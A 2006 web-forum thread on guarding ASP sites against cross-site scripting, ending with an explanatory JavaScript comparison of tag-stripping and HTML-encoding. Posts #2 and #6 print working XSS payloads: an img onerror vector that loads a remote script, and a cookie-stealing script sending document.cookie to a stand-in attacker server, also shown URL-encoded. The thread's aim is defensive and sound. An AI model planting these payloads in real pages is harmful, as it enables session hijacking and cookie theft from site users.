#1
Cross-site scripting
Anyone have some quick coding guidelines to follow to minimize the possibility of cross-site scripting?
__________________
====== Doug G ====== I didn't attend the funeral, but I sent a nice letter saying I approved of it. --Mark Twain
#2
Unfortunately, most people think the easiest way to prevent XSS attacks is to prevent the execution of JavaScript and filter out <script> type tags. This isn't true, and there are ways that a hacker can encode the data to bypass this type of data validation.

There are two types of XSS attacks: persistent and non-persistent. Persistent attacks are anything that could be entered and remain to affect virtually all users that access the page in which the attack occurs. Think of a post or thread on a message board. If a discussion forum allowed this type of attack it would be persistent and could affect any user who views that post or thread. Non-persistent attacks are more similar to phishing attacks. A targeted victim could be sent a link that appears legitimate; however, on closer inspection the link contains additional information that, if clicked, would allow the hacker to hijack the victim's session or execute malicious code in their browser.

Virtually any HTML tag can be used as an attack vector to allow remote code execution. Examples of some attack vectors:
Code:
<img src="" onerror="x=document.createElement('<sc'+'ript src=http://www.mansiononmain.com/xss.js>');document.body.appendChild(x)">
Code:
<table style="background:url('javascript:alert('Table Tag XSS Attack');')" border="1" width="100%">
<tr style="background:url('javascript:alert('Row Tag XSS Attack');')">
<td style="background:url('javascript:alert('Cell Tag XSS Attack');')"></td>
</tr>
</table>
The best way to prevent these types of attacks is to prevent this type of input. If you must allow it, then sanitize the results being returned from the client to ensure they don't contain anything that could be used maliciously. And when returning the results to the client, consider using Server.HTMLEncode.
Last edited by Memnoch : November 16th, 2006 at 05:58 PM.
#3
The idea is to sanitize any input that may be used in subsequent pages, like a forum post or similar? From what I understand of your example attack vector, this would be an img src that a user can add to some input that accepts HTML, and which would subsequently be re-displayed to a future user?
Thanks for your help. I recently saw a reference to some XSS vulnerability in Snitz code and didn't totally understand the flaw.
#4
Exactly. If you copy the img tag example into an HTML page and run it, you will see that the remote code gets executed and the page gets "hijacked".
#5
Thanks, Memnoch! It's becoming clearer now.
#6
You must also account for the fact that the attacker may URL-encode their scripts to prevent them from being picked out by your data sanitation scripts.
For example, the following two malicious scripts would do exactly the same thing once interpreted by the browser (they would both send the victim's cookies back to the attacker's server)...
Plain text... Code:
<script language=javascript>
document.write('<img src=http://the-attackers-server/script.asp?'+document.cookie+'>');
</script>
Encoded... Code:
%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3 D%6A%61%76%61%73%63%72%69%70%74%3E%0D%0A%64%6F%63% 75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%6D%67 %20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%68%65%2D%6 1%74%74%61%63%6B%65%72%73%2D%73%65%72%76%65%72%2F% 73%63%72%69%70%74%2E%61%73%70%3F%27%2B%64%6F%63%75 %6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%27%3E%27%29%3 B%0D%0A%3C%2F%73%63%72%69%70%74%3E
Also, XSS attacks can be performed via query strings (you probably knew that, but it is often overlooked). For example, someone came on ASPFree a while ago to get their site reviewed... it was vulnerable to XSS via its query strings... Eatlocal.com - Harmless XSS Example (look down the right-hand side when you go on the page)
__________________
LozWare Website Directory Whooo! Free submissions, no recip needed. I'm a nice guy
Last edited by LozWare : November 19th, 2006 at 02:28 PM.
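As an added example (not code from the thread or from ASP), here is a small JavaScript comparison of the two approaches discussed in posts #2 and #6: a naive filter that strips <script> tags from the raw request value, versus URL-decoding the value the way the server does and then HTML-encoding it on output in the manner of Server.HTMLEncode. The `htmlEncode` function is an assumed equivalent of that ASP call, not the library itself, and the sample inputs are constructed to match the shapes shown in the thread.

```javascript
// Tolerant URL-decoder: what the server sees once a query-string value is
// unescaped; it does not throw on the stray spaces a forum inserts into long blobs.
function urlDecodeLoose(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// The naive approach post #2 warns against: strip <script> tags from the raw value.
function stripScriptTags(s) {
  return s.replace(/<\/?script[^>]*>/gi, "");
}

// Assumed Server.HTMLEncode equivalent: encode the characters that let text escape
// into markup or attribute context, so the browser renders them as literal text.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Would the browser parse a tag out of this string? Any tag is enough: the thread's
// <img onerror> and style="url(javascript:...)" vectors need no <script> at all.
function containsTag(s) {
  return /<\s*[a-z!\/]/i.test(s);
}

// Constructed sample inputs shaped like the thread's vectors; nothing is executed.
const SAMPLES = {
  imgHandler: '<img src="" onerror="alert(1)">',
  styleUrl: "<td style=\"background:url('javascript:alert(1)')\"></td>",
  encodedScript: encodeURIComponent("<script>alert(1)</script>"),
};

// For each sample: does a parsable tag survive (A) filtering the raw value before
// the server URL-decodes it, versus (B) decoding first and HTML-encoding on output?
function compare() {
  const out = {};
  for (const [name, raw] of Object.entries(SAMPLES)) {
    out[name] = {
      filterLeavesTag: containsTag(urlDecodeLoose(stripScriptTags(raw))),
      encodeLeavesTag: containsTag(htmlEncode(urlDecodeLoose(raw))),
    };
  }
  return out;
}
```

`compare()` reports `filterLeavesTag: true` for all three samples (the img and style vectors never contained `<script>`, and the encoded one only becomes a tag after the server decodes it), while `encodeLeavesTag` is `false` for all three.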
Viewing: ASP Free Forums > System Administration > Windows Security > Cross-site scripting